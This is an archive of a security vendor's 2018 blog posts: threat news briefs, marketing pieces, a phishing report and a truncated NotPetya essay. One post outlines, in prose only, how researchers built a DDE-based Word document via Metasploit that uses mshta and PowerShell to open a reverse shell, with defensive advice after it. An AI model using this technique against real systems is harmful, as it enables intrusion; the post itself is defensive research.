Author Archives: Mikayla Townsend

Threat Intelligence Brief: April 18, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Defense

“Great Western Railway urges online customers to update passwords after cyber-attack. The firm said hackers used an automated system to gain access to 1,000 customer accounts on its website and is taking action. While only a very small number of accounts have been affected by the attack, cybersecurity experts are complimenting the company’s proactive efforts to inform its customers of the best practice in these situations.”

 –The Sun

Energy

“A cyberattack that U.S. natural gas pipeline owners weren’t required to report has lawmakers taking a closer look at how the industry is handling such threats, raising the prospect of tighter regulation. “In website notices to customers this week, at least seven pipeline operators from Energy Transfer Partners LP to TransCanada Corp. said their third-party electronic communications systems were shut down, with five confirming the service disruptions were caused by hacking. But the companies didn’t have to alert the U.S. Transportation Security Administration, the agency that oversees the nation’s more than 2.6 million miles of oil and gas conduits in addition to providing security at airports.” “Though the cyberattack didn’t disrupt the supply of gas to U.S. homes and businesses, it underscores that energy companies from power providers to pipeline operators and oil drillers are increasingly vulnerable to electronic sabotage. It also showed how even a minor attack can have ripple effects, forcing utilities to warn of billing delays and making it more difficult for analysts and traders to predict a key government report on gas stockpiles.” “At a congressional hearing in March, Maria Cantwell, a Democratic senator from Washington, told Perry that budget cuts could make it more difficult to shield the energy sector from cyber intrusions. “Our energy infrastructure is under attack,”’ Cantwell said. “A year ago, I called for a comprehensive assessment of cyber attacks to our grid by Russians. We don’t need rhetoric at this point – we need action.” The threat appears to be widespread. Two years ago, the Department of Energy’s Pacific Northwest National Laboratory in Richland, Washington, said its firewall system blocks 25,000 cyberattacks a day.””

Bloomberg

Information Security Risk

“Several vulnerabilities have been found in the Linux command line tool Beep, including a potentially serious issue introduced by a patch for a privilege escalation flaw. An unnamed researcher discovered recently that Beep versions through 1.3.4 are affected by a race condition that allows a local attacker to escalate privileges to root. The security hole has been assigned CVE-2018-0492 and it has been sarcastically described as “the latest breakthrough in the field of acoustic cyber security research.” Someone created a dedicated website for it (holeybeep.ninja), a logo, and named it “Holey Beep.” The individual or individuals who set up the Holey Beep website have also provided a patch, but someone noticed that this fix actually introduces a potentially more serious vulnerability that allows arbitrary command execution.”

Security Week

Operational Risk

“The UK has conducted a “major offensive cyber-campaign” against the Islamic State group, the director of the intelligence agency GCHQ has revealed. The operation hindered the group’s ability to co-ordinate attacks and suppressed its propaganda, former MI5 agent Jeremy Fleming said. It is the first time the UK has systematically degraded an adversary’s online efforts in a military campaign. Mr Fleming made the remarks in his first public speech as GCHQ director. “The outcomes of these operations are wide-ranging,” he told the Cyber UK conference in Manchester. Mr Fleming said much of the cyber-operation was “too sensitive to talk about”, but had disrupted the group’s online activities and even destroyed equipment and networks. “This campaign shows how targeted and effective offensive cyber can be,” he added. But Mr Fleming said the fight against IS was not over, because the group continued to “seek to carry out or inspire further attacks in the UK” and find new “ungoverned spaces to base their operations”.”

 –BBC

The post Threat Intelligence Brief: April 18, 2018 appeared first on LookingGlass Cyber Solutions Inc..

RSA Preview: Compromised Credentials are STILL Your Organization’s Worst Nightmare

RSA, the industry’s biggest (arguably) conference, starts this week. Before you get blinded by all of the shiny new technology and product and acquisition announcements, remember that having clean cybersecurity hygiene begins with the basics – patch and routinely update your systems, educate your employees, protect your passwords.

LookingGlass has access to a lot of places on the Internet, including the Deep and Dark Web where most data dumps and passwords leaks occur. Armed with this information, we are able to maintais a proprietary Data Breach Detection System (DBDS) that continuously scours underground forums, hacker channels, and the dark web to uncover the latest data breaches and identify compromised accounts. Adding an average of several million findings per week, this system contains almost 5 billion records that are connected to approximately 3.5 billion unique username/password pairs.

As we see cyber attacks increase in size and sophistication, we often forget that some of the biggest attacks started with basic password cracking, or phishing/social engineering scheme. Analyzing compromised credentials can reveal a lot about the cybersecurity practices of organization’s across verticals, and of all sizes. LookingGlass reviewed all compromised credentials within our DBDS from 2017 for the Fortune 100 companies and discovered that the most heavily-impacted business sectors were Technology, Financial, Insurance, and Telecommunications. The below chart compares the unique credentials LookingGlass uncovered in 2017 for the Fortune 100 companies by sector.

In addition, across all Fortune 100 companies, an average of 33% of all employees reused their login credentials. Organizations within the Telecommunications sector represented the highest percentage of reused login credentials, with nearly 45% of employees reusing usernames and passwords across multiple IT systems and web applications.

Credential reuse is a significant concern to organizations across all business sectors because threat actors routinely use lists of these compromised credentials to gain access to business networks via web applications and other public-facing network infrastructure.  For example, it is simple for a threat actor to check for Web-based email services associated with each domain, potentially allowing a hacker to access the user’s work email account and to view or exfiltrate any sensitive information it may contain.

Assuming that the LookingGlass sample for Fortune 100 companies is a reflection of global organizational trends in credential security hygiene, we judge that at least one-third to one-half of the compromised credentials could likely facilitate illicit access, or cause otherwise negative repercussions, to many organizations. This threat is further exacerbated if an organization is unaware of credential compromises relevant to them or does not have other security measures in place to mitigate the risk of compromised credentials, such as two-factor authentication.

3 Steps Organizations Can Take to Protect User Credentials

  1. Encourage and Enforce Password Hygiene Best Practices – Educate employees on best practices associated with password hygiene (i.e. frequently change credentials, diversify passwords across account, etc.). Require employees to routinely update their passwords and avoid repeated use across multiple platforms.
  2. Manage Your Third Party Risks – Consistently monitor who is accessing your network and hardware. Are they trying to access areas of the network they shouldn’t be? Limit third parties’ access to specific portions of the network instead of allowing them to roam free.
  3. Back Up Your Data! – If your credentials are compromised, it will be easier to replace than to start from scratch.
  4. Educate Your Employees – Phishing attacks are still one of the biggest ways organizaiton’s are breached. Don’t give away confidential information, like your password.

 

How Can LookingGlass Help These Steps?

LookingGlass offers tiered solutions to help organizations deal with the risks compromised credentials pose to you and your key vendors:

  • The LookingGlass Baseline Attack Surface Report™ is a cost-effective first step in determining which of your vendors pose the most risk to your organization. Your report will not only provide a historical analysis but also help you meet compliance and regulatory requirements when the occasion arises.
  • The LookingGlass Cyber Attack Surface Analysis™ is a deep-dive assessment of vendors that may have access to your organization’s networks and sensitive data. It not only provides a historical analysis of potential compromise, but may also assist your organization in meeting compliance and regulatory requirements. In addition, the Cyber Attack Surface Analysis can evaluate the cybersecurity hygiene of a company when conducting M&A activity.
  • The LookingGlass Third Party Risk Monitoring service delivers continuous visibility into the risk exposure and attack surface of your organization’s key vendors. This is an outsourced way to analyze your third party vendors’ risk impact to your organization. Our managed service keeps a watchful eye on your vendors’ networks 7/24/365, helping you to make informed, intelligent decisions about the cyber safety of your organization.

 

In addition, protect your organization’s attack surface with one of the LookingGlass “as-a-Service” offerings: Information Security, Brand Security, or Physical Security Monitoring:

  • Information Security-as-a-Service™: Protect your organization’s network and sensitive data. LookingGlass analysts monitor and identify information security threats such as phishing, malware, ransomware, and more.
  • Brand Security-as-a-Service™: Protect your organization’s brand, trademarks/logos, intellectual property, and online reputation.
  • Physical Security Monitoring-as-a-Service™: LookingGlass analysts monitor for risks to your organization’s most valuable physical assets, such as imposter social media accounts, unauthorized domain names, and threats against employees, executives, and facilities.

Interested in learning more about any of our offerings, or want to chat with one of our security experts? Find us at RSA – Booth 100 in the South Hall.

The post RSA Preview: Compromised Credentials are STILL Your Organization’s Worst Nightmare appeared first on LookingGlass Cyber Solutions Inc..

Why Cyber Response Mechanisms Must Talk to Each Other…

As I was preparing to write this blog on the importance of interoperability across cyber defense systems, I read the following news article “Why America’s Two Best Fighter Jets Can’t Talk to Each Other”. One of the salient points in this article is that reportedly the communication systems in the newer model fighter jet is not integrated with an older model fighter jet.

Two article quotes drew my attention particularly:

“The U.S. fifth-generation jets are adept at disseminating a more detailed view of the battle space to older aircraft, increasing the former’s “survivability” in combat…”

“The thing that’s great about having Link 16 and MADL onboard and the sensor fusion is the amount of situational awareness the pilot has…”

An integrated communication system is a vital part of these fighter jets and the combined strength those fighters provide. A similar point can be made about the lack of interoperability and easy integration in cyber defense between cybersecurity systems.

The issues these fighter jets have illustrates the technical, business, and organizational challenges that can get in the way of technology integrations necessary for the effective use of technology intended to protect and defend. More importantly, the impact on the security of organizations can be significant when defensive systems are not integrated in meaningful and effective ways.

Recently, I had the opportunity to discuss the key challenges faced in cyber defense integration in a joint webinar with Jason Keirstead (IBM Security) and Henry Peltokangas (Cisco Systems) on Cyber Threat Intelligence Collaboration.

 

Why does interoperability matter?

Whether at a small-medium enterprise or the largest multi-national organization, most security deployments generally share these common characteristic:

No Single Vendor

  • Typically, there is no single vendor that has deployed all of the systems that must exchange Cyber Threat Intelligence (CTI) and Security telemetry (e.g. events, logs).
  • Many organizations choose best of breed for firewalls vs. identity authentication vs. Intrusion Detection Systems (IDS) vs. web proxies vs. threat analysis platforms.

Multi-Functional

  • One of the primary reasons for having different products (from different vendors) in a security deployment is that each product performs vital tasks and functions and may not even be run or operated by the same security analysis and security operations teams.

Coordinated Action

  • Teams and their respective products must work collaboratively to collect, analyze, refine, and ultimately operationalize CTI.
  • The complexity involved in building security systems can be quite daunting but it becomes even more complex if those systems need to share data and actions to make security work successfully.
  • Often times, real-time data may indicate a threat that must be acted upon quickly but without suitable interoperable systems working collaboratively it’s almost impossible to provide an effective real-time response.

Ultimately, the goals for interoperability are to drive ease of deployment, ease of maintenance, and ensure that complex systems tasks can be performed when they connect together.

Sounds easy?

Here’s a recent example that helps explain the challenge:

Real World Technology Fail Example

In the above scenario, a multi-national organization purchased a Threat Intelligence Platform (TIP) from one vendor and an Endpoint Protection system from a second vendor. Both vendors had developed their products to exchange OASIS STIX/TAXII Version 1 standards-based intelligence. Both vendors claimed their products supported the standard protocol and content.

When the multi-national organization came to connect those systems together the TIP and Endpoint Protection system failed to exchange intelligence correctly. After initially trying to debug the issue themselves, the organization escalated the integration challenges to both vendors to resolve the communication issues.

Fortunately, in this scenario both vendors were able to investigate and come up with a solution to integrate the CTI products successfully. However, the reality is that even with standards (as a basis for security integration), there remains ample opportunity for technology companies to miss important aspects that end up sabotaging off-the-shelf integration with other vendors.

The Impact

The above example shows the negative consequences that  integrating products from various vendors has on security. More specifically, the following areas are most impacted:

Expertise & Human Assets

  • To understand technically what is working.
  • Organizations have to learn a lot more about what technology is doing to share the content between systems.
  • Takes time to either hire or train folks, as well as to learn about the different product interfaces instead of just expecting them to ‘work’.

Time & Costs

  • Multiple days or weeks to make it ‘work’.
  • Multiple organizations involved.
  • Costs of people and systems time without operational benefits.

Capability

  • Point products have limits to what features they provide as standalone solutions.
  • Point products are limited to what they can detect and block when not an integrated system.
  • Introducing CTI into deployments consisting of multiple point products results in the worst case where each product has its own blacklist or method of consuming the intelligence and the security team has to manually copy/paste the intelligence to each.
  • It adds huge amounts of human error that can undermine protection.
  • In many cases, the lack of coordinate capability can cause unexpected results and worse, could undermine protection.

As a result, the true winners are the adversaries.

What should we do?

There are a few ways to improve and implement interoperability in your organization. In my next blog, I’ll give you some best practices including:

  • STIX Preferred program
  • Interoperability key tenants

If you want to discuss this blog or integrated LookingGlass cyber defense solutions please reach to myself on Twitter (@tweet_a_t) or contact us. If you are going to RSA 2018 please come to the STIX and TAXII Meet-up on April 18, 2018 to chat with me more on this topic.

 

The post Why Cyber Response Mechanisms Must Talk to Each Other… appeared first on LookingGlass Cyber Solutions Inc..

Threat Intelligence Brief: April 11, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Information Security Risk

“Retailer Hudson’s Bay Co disclosed that it was the victim of a security breach that compromised data on payment cards used at Saks and Lord & Taylor stores in North America. One cyber security firm said that it has evidence that millions of cards may have been compromised, which would make the breach one of the largest involving payment cards over the past year, but added that it was too soon to confirm whether that was the case. Hacking group JokerStash a.k.a. Fin7 is alleged to have spent a year collecting payment card records with the intention of selling the compromised accounts on the dark web.”

 –Reuters

Insurance + Healthcare

“New Jersey’s Division of Consumer Affairs is levying a fine against Virtua Medical Group after the provider organization suffered a breach that released the protected health information of several hundred of its patients two years ago. The network of physicians, which spans more than 50 South Jersey practices and part of the Virtua Health delivery system, will pay a total of $417,816 and improve data security following a breach of protected health information affecting 1,654 patients whose health records were found to be viewable on the Internet because of a server misconfiguration by a vendor in January 2016.”

Health Data Management

Retail

“Sears Holding Corp, Best Buy, and Delta Air Lines have announced that some of their customer payment information may have been exposed in a cyber security breach at software service provider [24]7.ai. In a statement made by Delta Airline, cybercriminals planted a piece of malware in [24]7.ai software, which captured some payment card data between September 26 and October 12, 2017. Sears and Delta said they were only notified by [24]7.ai in mid and late March, several months after the breach had been supposedly contained.”

Reuters

Operational Risk

“Malaysia’s central bank announced that it has suffered a cyberattack in which hackers sought to steal money through fraudulent wire transfers over the SWIFT network. The bank did not disclose who was behind the attack or how they accessed its SWIFT servers while also noting that no funds were lost. The incident marked the second known hack of a central bank after the 2016 theft of $81 million from the Bangladesh Bank. ”

 –Nasdaq

The post Threat Intelligence Brief: April 11, 2018 appeared first on LookingGlass Cyber Solutions Inc..

DDE Exploitation – Macros Aren’t the Only Thing You Should be Counting

Exploitation of the Microsoft® Dynamic Data Exchange (DDE) protocol is increasingly being used to launch malicious code in weaponized email attachments. A native feature in Microsoft, DDE allows data to be pulled from other sources, such as updating a spreadsheet from an external database. As with many features, DDE can be leveraged for malicious purposes.

Old Dog, New Tricks

Malicious email attachments are nothing new, but the traditional attack vector has been via macros embedded into the files. Macros are simply shortcuts for sequences of commands and/or keystrokes. Studies show that at least a quarter of phishing attempts involve malicious macros embedded in Microsoft Office documents. As noted by the SANS Internet Storm Center, “…attackers are using DDE because it’s different. We’ve been seeing the same macro-based attacks for years now, so perhaps criminals are trying something different just to see if it works any better.”

Apparently, DDE exploitation does work, as observed in several malware campaigns, including distribution of Locky ransomware through the Necurs botnet and also in the spread of the Hancitor downloader. The technique was also used against Fannie Mae employees in October 2017, when attackers sent phishing emails promising free tickets to a Halloween event at a local Six Flags amusement park. More recently, DDE exploitation was found being used in the Dridex banking trojan to execute a shell command to download malware. It was also used in association with the distribution of the Zyklon backdoor.

Of Course, There’s a Metasploit Module for That

The DDE exploit can be created using custom Metasploit modules available through GitHub and other sources. The LookingGlass™ research team tested a module designed to open a backdoor communication channel (reverse shell) between the victim and attacker.

Once the exploit is configured, the next step is crafting the malicious Microsoft Office document. This is done by inserting a coded field that contains the output from the Metasploit DDE module.

DDE exploit embedded in Word Document

 

Syntax of the code in our test case is as follows:

DDE Exploit Code

The document is then sent victims, typically via a phishing email, and targets Microsoft Word in a Windows operating system. When the victim opens the document, they are presented with a pop-up that prompts them to “update” the document with data from linked files. The default response is no, but if the user clicks yes, the malicious code will be launched using the Microsoft HTML Application Host (mshta.exe) and PowerShell to retrieve the HTML Application (HTA) payload from the remote server.

DDE Exploit Pop-Up Window

 

In our test case, the code enabled a connection back to our “attack” server. From that session, we were able to remotely run commands and upload and download files. This activity was not readily observable from the victim computer. Interestingly, the connection remains open even if the document is closed.

Established Connection Between Victim and Attacker

 

File Download Example

Avoiding the DDE Phishing Hook

Unfortunately, infected files are not easy to signature since the exploits can vary widely in syntax and the documents themselves can contain a variety of text and images.

If you are a systems admin or IT practitioner, here are some things you can do to protect your organization’s network:

  • Download Windows Defender (can detect use of DDE exploits and you can turn off DDE itself in the Windows registry)
  • Monitor outbound connections, particularly on unusual ports
  • Phishing education

At this point, we all know cyber threats are become more sophisticated and targeted. Creating a culture of security in your organization and basic cyber hygiene is the easiest and fastest way to keep your networks clean and the bad guys out.

Want more insights like this into new vulnerabilities and exploits? Learn more here.

Marcelle Lee is a LookingGlass threat researcher who is active in the cybersecurity community. Check out her upcoming speaking opportunities here and reach out to her on Twitter at @Marcelle_FSG.

 

The post DDE Exploitation – Macros Aren’t the Only Thing You Should be Counting appeared first on LookingGlass Cyber Solutions Inc..

LookingGlass Cyber Solutions Receives 5-Star Rating in CRN 2018 Partner Program Guide

press-release

Cyber Guardian Network Recognized as a Top Partner Program for the Second Consecutive Year

Reston, VA – April 2, 2018 – LookingGlass™ Cyber Solutions, a leader in threat intelligence-driven security, today announced its Cyber Guardian Network received its second consecutive 5-Star rating in CRN’s Partner Program Guide. The Partner Program Guide is a listing of partner programs providing products and services through the IT channel. The 5-Star designation is reserved for a subset of companies offering the best partnering elements to their solution provider partners.

Launched in 2017, LookingGlass’ Cyber Guardian Network focuses on empowering security teams around the world to confidently prevent, detect, understand and respond to prioritized, relevant threats throughout every stage of the threat lifecycle. Specifically, LookingGlass enables Managed Security Services Providers (MSSPs) and solution providers to augment their existing security services portfolios with LookingGlass’ Threat Intelligence-as-a-Service offerings and deliver information security, brand security or physical security monitoring and protection, backed by LookingGlass’ global team of security experts.

“The LookingGlass team is proud to receive this recognition from CRN for a second consecutive year as we consistently strive to deliver relevant, high-quality threat intelligence products and services to our partners and customers around the world,” said Pete Agresta, Chief Revenue Officer at LookingGlass Cyber Solutions. “Over the past year and a half, more than 50 companies have joined the Cyber Guardian Network – a testament to the value our program delivers to our partners as they help their customers select the ideal solutions to efficiently and effectively combat today’s sophisticated cyber attacks.”

The LookingGlass Cyber Guardian Network is consistently recognized for the value it provides companies around the world via an extensive network of resellers. In addition to the Partner Program Guide recognition, Laurie Potratz was named a 2017 and 2018 CRN Channel Chief, recognizing her leadership of LookingGlass’ partner program and her dedication to the IT channel.

For more information or to join the LookingGlass Cyber Guardian Network, visit https://partners.lookingglasscyber.com/English/.

 

About LookingGlass

LookingGlass Cyber Solutions delivers unified threat protection against sophisticated cyber attacks to global enterprises and government agencies by operationalizing threat intelligence across its end-to-end portfolio. Scalable threat intelligence platforms and network-based threat response products consume our machine-readable data feeds to provide comprehensive threat-driven security. Augmenting the solutions portfolio is a worldwide team of security analysts who continuously enrich our data feeds and provide customers unprecedented understanding and response capability into cyber, physical and 3rd party risks. Prioritized, relevant and timely insights enable customers to take action on threat intelligence across the different stages of the attack life cycle. Learn more at https://www.lookingglasscyber.com/.

 

Contact

Christy Pittman
W2 Communications for LookingGlass
Christy@w2comm.com
703-877-8108

 

Source: https://www.businesswire.com/news/home/20180402005325/en/LookingGlass-Cyber-Solutions-Receives-5-Star-Rating-CRN

The post LookingGlass Cyber Solutions Receives 5-Star Rating in CRN 2018 Partner Program Guide appeared first on LookingGlass Cyber Solutions Inc..

Elevating Your Security Posture with Threat-Intelligence-as-a-Service

Every enterprise organization is in a security arms-race that they must win. As technology becomes ever-more intertwined into every business process and every element of the customer experience, the impact of a security breach becomes catastrophic.

Of course, every enterprise already knows this.

The question, however, is what to do about it when the organization must also evolve and expand its technology stack to meet the insatiable needs of its customers and the market.

As the attack surfaces continue to proliferate, enterprises cannot turn away or let their guard down. Instead, they must find a way to continually elevate their security posture and get ahead of the bad actors who are, likewise, continually seeking a vulnerability that will give them an opening.

A more efficient and effective way of approaching cybersecurity promises to help enterprises get the upper hand in this game of cat-and-mouse by identifying emerging threats before an attack begins — and delivering this intelligence in an actionable form without the overhead. The approach? Threat-intelligence-as-a-service.

The Losing Battle for Containment

When it comes to an organization’s security posture, there’s a natural evolution that occurs. The first stage of evolution is all about containment and perimeter security.

In this first stage, the focus is on establishing a perimeter, securing it and then containing any further exposure. This need for containment is so that organizations can define the theater of engagement — ensuring that what’s inside is safe so they can focus resources on protecting the perimeter.

This type of first-stage security posture has been the predominant focus of IT organizations. But this kind of security posture only works when you can effectively define and contain your perimeter — or, as it is also called, your attack surface.

As your attack surface expands or changes, especially when it is doing so at a rapid rate, containment becomes almost impossible. In these situations of an uncontainable attack surface — precisely what is happening now in the era of digital transformation —  the organization must evolve its security posture to the next level. The question is how?

Why Threat Intelligence is in Your as-a-Service Future

The natural response to dealing with an expanding attack surface is to keep doing the same things – just faster and more expansively. This approach, however, is not only exhausting, it’s ineffective.

It’s a bit like trying to keep all the plates spinning on their poles – it’s only a matter of time before it all comes crashing down.

Organizations must, therefore, find a way to identify threats before they ever reach their dynamic and expanding perimeter and then respond preemptively. We call this concept of identify threats before a security event has happened, threat intelligence.

On the surface, employing threat intelligence sounds like the next logical step to proactively protect the organization’s hard-to-contain perimeter. But doing so is much harder than it sounds.

Identifying emerging threats to the enterprise, without creating a debilitating surge of false-positive alerts, requires equal measures of intelligence information, triage capabilities, and expertise to identify indicators that represent a threat to the enterprise.

Delivering effective threat intelligence is a mixture of science and art – and a capability that many enterprises are finding difficult and expensive to build in-house.

Threat Intelligence-as-a-Service, however, promises to deliver the threat intelligence capabilities that enterprises need, without the cost and overhead of building it themselves. Utilizing a managed service for threat intelligence will help enterprises develop this now-essential capability while minimizing the resource impact to the organization.

The Intellyx Take

It may be discomforting for enterprise executives to hear that they need to elevate their security posture and expand their already resource-strapped security operations further afield.

Creating a threat intelligence capability is not the core business of most enterprises. It is nevertheless essential for enterprise leaders to take an active response posture and engage threats far beyond their continuously evolving perimeter. Doing so, however, requires intelligence about those threats and the skills and expertise to make sense from the intelligence data.

This need for intelligence, but the counter-desire to not build and manage a threat intelligence capability is why enterprises are now turning to industry pioneers such as LookingGlass and their threat-intelligence-as-a-service offerings to strike this balance by outsourcing this critical capability.

There is no question that the security arms-race is continuing to escalate. The bad actors are well-funded, organized and ambitious. Enterprise organizations must respond in-kind, but must do so intelligently.

While an enterprise can never outsource its security responsibility, it can and should seek to leverage outside resources that can extend its capabilities in the most resource-efficient manner possible. As the fight between enterprises and those who wish to do them harm continues, enterprise leaders will need every advantage they can muster.

 

Copyright © Intellyx LLC. LookingGlass is an Intellyx client. Intellyx retains full editorial control over the content of this paper.

The post Elevating Your Security Posture with Threat-Intelligence-as-a-Service appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 27, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Technology

“Expedia subsidiary Orbitz today revealed hackers may have accessed personal information from about 880,000 payment cards. The business said an investigation showed that the breach may have occurred between Jan. 1, 2016 and Dec. 22, 2017 for its partner platform, and between Jan. 1, 2016 and June 22, 2016 for its consumer platform. Information such as names, phone numbers, email and billing addresses may have been accessed, the travel website operator said. It said its website, Orbitz.com, was not impacted. “To date, we do not have direct evidence that this personal information was actually taken from the platform and there has been no evidence of access to other types of personal information, including passport and travel itinerary information,” Orbitz said. The company said it has addressed the breach after it was discovered in March this year. Credit card issuer American Express said in a statement that the attack did not compromise its platforms.”

 –Reuters

Energy

“Dozens of demonstrators were arrested and three police officers were injured during protests at the Kinder Morgan site in Burnaby this week. Mounties said at least a dozen people were arrested on Shellmont Street Tuesday, many of whom had breached a court-ordered injunction involving the Trans Mountain facility. The arrests came a day after 19 people were arrested at a similar protest, 13 of whom had breached the injunction. One male protester was arrested after locking himself to the front of an excavator being transported on the back of a truck. He was extracted from the lock and held in civil contempt of a court ordered injunction. A woman was arrested after climbing on top of the same excavator and refusing to come down. She eventually did climb down after what RCMP described as “hours of negotiation.””

CTV

Information Security Risk

“Facebook says it has suspended the account of Cambridge Analytica amid reports it harvested the profile information of millions of US voters without their permission. The company reportedly stole information from 50 million Facebook users’ profiles, to help them design software to predict and influence voters’ choices at the ballot box. Also suspended were the accounts of its parent organization, Strategic Communication Laboratories, as well as those of two University of Cambridge psychologists and a Canadian data analytics expert who worked with them. The premise of the collection was through the use of an app, which offered a personality prediction test, describing itself on Facebook as “a research app used by psychologists.” Some 270,000 people downloaded the app allowing researchers to access information such as the city listed on their profile, or content they had “liked.” However, the app also collected the information of the test-takers’ Facebook friends, leading to the accumulation of a data pool tens of millions-strong.”

The Guardian

Operational Risk

“A new variant of the FakeBank Android malware includes the ability to intercept phone calls victims are making to their banks and redirecting users to scammers. This new FakeBank variant is currently active in South Korea, researchers said. Experts found the FakeBank banking trojan inside 22 Android apps distributed via third-party app stores and via links shared on social media sites.”


The post Weekly Threat Intelligence Brief: March 27, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Camouflage & Deception: A New Approach to Threat Mitigation

Organizations are faced with threats that range from annoyances to more sophisticated threats crafted by an adversary with intention and forethought on their objectives. The prevalence of exploit kits and malware and botnet toolkits being shared by bad actors across the Internet and Dark Net makes it easier for actors to build more sophisticated threats.

How can security teams disrupt adversarial activities more effectively?

It is no longer enough for our threat response to focus solely on detection and blocking. We need cyber defenses that will disrupt the threat activities of an adversary.

Security teams have adopted a multi-faceted security infrastructure consisting of firewalls, IDS/IPS, content-inspection, and behavioral analytics defense systems. This layered defense strategy provides protection for the majority of detectable threats that are found using a combination of signature-based and non-signature-based detection mechanisms.

An active defense posture builds on this foundation to disrupt threat activities of the adversary; it examines how an adversary may progress through a cyber kill chain and how we can impact the adversary, causing them to pivot to new TTPs or a different target entirely.

Figure 1: Typical actor activities during kill-chain progression

Increasing the time it takes for the adversary to progress through the kill-chain, the expertise required to launch a cyber attack, and ultimately the cost to execute should be additional security objectives.

Many solutions focus solely on one phase of the kill chain such as detecting or blocking C2 communications. But I recommend a broad-based approach to disruptive cyber defense mechanisms that can be applied across all aspects of the kill chain. For example, which phase of the kill chain are we disrupting? Which aspect of progression will have the most impact on the adversary?

Figure 2: Where disruptive techniques can be applied

There are two disruptive approaches to consider adding to your response strategy.

Camouflage: the act, means, or result of obscuring things to deceive an enemy by painting or screening objects so that they are lost to view in the background, or by making up objects that from a distance have the appearance of fortifications.

 

 

Deception: to mislead by a false appearance or statement.

 

 

Applying both of these techniques to cyber defense strategy can help:

  • Predicting Attacks
    • Ability to gather low-false positive threat intelligence on adversary tactics, indicators…etc.
    • Ability to more easily understand goals, motives, intent
  • Detecting Activities
    • Ability to gather more advanced detection when other protections fail
    • Early alerting and notification to operations without impact to business-critical systems
  • Disrupting & Responding
    • Easily engage with attackers and their TTPs
    • Easy reconnaissance on the attacks
    • Manipulation of behaviors and interactions that confuse, delay, or interrupt attacker’s activities
    • Increase the cost, expertise required, and impact on the attacker

There are at least two areas to apply camouflage and deception activities:

  • Network-Based
    • Interact with TTPs within the network (e.g. routers, firewalls, proxies)
  • Network-Endpoint-Based
    • Interact with TTPs at the endpoint systems (e.g. laptop, mobile, servers)

 

Network-Based Camouflage: Camouflaging unpatched servers from vulnerability discovery

Many IT & security teams are often unable to keep up with the continuous challenge of maintaining software patch levels on all servers (both external and internal). In some cases, there are business process impacts that must be considered before the team maintaining the server pushes an update to the operating system or application stack running on the server. These necessarily impact the velocity of patch updates and therefore while those decisions are being considered the servers may remain vulnerable to being exploited.

Network-based camouflage is another way to protects against certain types of vulnerabilities. This method involves obfuscation and camouflage by an intermediary network system configured to do so based on threat intelligence on the vulnerabilities and TTPs that may be used to exploit the vulnerability.

For example, the ROBOT vulnerability is a vulnerability of TLS Cipher settings that can be camouflaged as shown in the diagram below:

Figure 3. ROBOT Vulnerability Camouflage

 

Network-Endpoint Deception Example: Server Decoys

In addition to camouflaging vulnerabilities on servers and endpoints, security teams can leverage deception techniques. This involves running various decoy systems that impersonate legitimate systems in an organization’s network that can act as an enticement to actors that may have be attempting to breach the perimeter or already have. The endpoint decoy can provide vital insight to the TTPs performed by those actors. As shown below, the decoys can be provisioned to provide attractive results for an adversary to explore and ultimately spend time considering the false information provided by the decoy. This increases the time the adversary is being watched and can provide useful intelligence on their objectives and ultimate goal.

Figure 4. Endpoint System Decoy

There are other defense techniques that can leverage these two capabilities in useful and interesting ways and also extend the camouflage and deception options available to security teams. If you are considering threat responses beyond traditional mitigation steps in your environment I hope you found this background useful. To learn more about LookingGlass’ use of camouflage and deception techniques for threat mitigation, please contact me at @tweet_a_t or @LG_Cyber.

 

The post Camouflage & Deception: A New Approach to Threat Mitigation appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 20, 2018

weekly-phishing-report

The following data offers a snapshot into the weekly trends of the top industries being targeted by phishing attacks from March 11 –  17, 2018.

This week, we saw a decrease in overall phishing activity – 25% – for the top 20 brands we monitor. With the largest increase in activity being from Computer Hardware and the largest decrease being from Internet Search & Navigation Services. Only three industries saw increases in phishing this week.

The top 3 industries that saw an increase in phishing activity this week:

  1. Computer Hardware (>80%)
  2. Computer Software (>55%)
  3. Electronic Payment Services (>5%)

 

The top 5 industries that saw a decrease in phishing activity this week: 

  1. Internet Search & Navigation Services (>50%)
  2. Telecommunications (>45%)
  3. Storage & Systems Management Software (>25%)
  4. Banking (>20%)
  5. Social Networking (>10%)

 

By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.


The post Weekly Phishing Report: March 20, 2018 appeared first on LookingGlass Cyber Solutions Inc..

NotPetya’s Challenge? Re-Prioritize Your Information Security

The damaging wiper attack last June carried a clear message for global organizations: you need to re-prioritize your security spending.

About a month after the NotPetya malware outbreak in late June, 2017, I was on the phone with someone I’ll call “Stacy,” who worked for a freight forwarding firm in the U.S. At the time we spoke, Stacy was desperate to locate a very important piece of equipment known as a “blow out preventer” (or BPO) that her company had contracted to ship to a customer in Norway for use on one of the offshore oil platforms there.  At the time, the BPO had gone missing. That is surprising, if you’ve ever seen one. They’re massive pieces of equipment that get trucked around on 40-foot flatbed trucks.

Stacy knew where her shipment was: sitting on the dock in Bremerhaven, Germany, where it had landed right around the time NotPetya, began spreading on June 27th. The problem was that her shipping company, A.P. Møller-Maersk, didn’t. Instead, it was scrambling to respond to the attack.

We now know that, behind the scenes, Maersk’s IT staff mounted a heroic effort: reinstalling over 4,000 servers, 45,000 PCs, and 2500 applications over the course of ten days in late June and early July 2017, according to statements by that company’s CEO at the World Economic Forum in Davos in January. The virus cost Maersk more than $300 million dollars to recover.   But the effects of the crippling attack rippled out to companies large and small, as well. Stacy’s firm had to spend money having the blowout preventer surveyed in Bremerhaven to make sure it was not damaged by sitting on the dock. Firms that were lined up to transport the part to the offshore rig in late June also lost business. The oil rig the part was destined for was kept idle waiting for the part’s arrival. The cost to the global economy are unknown – but are certain to total billions – if not hundreds of billions of dollars.

What is the moral of this story for executives at firms like Stacy’s? Not falling for the next NotPetya means figuring out what those weaknesses were and addressing them. But it also requires firms to stay ahead of threats so that they can anticipate new attacks, not merely respond to them.

What were NotPetya’s lessons? Here are some to consider:

Reimagine your risk

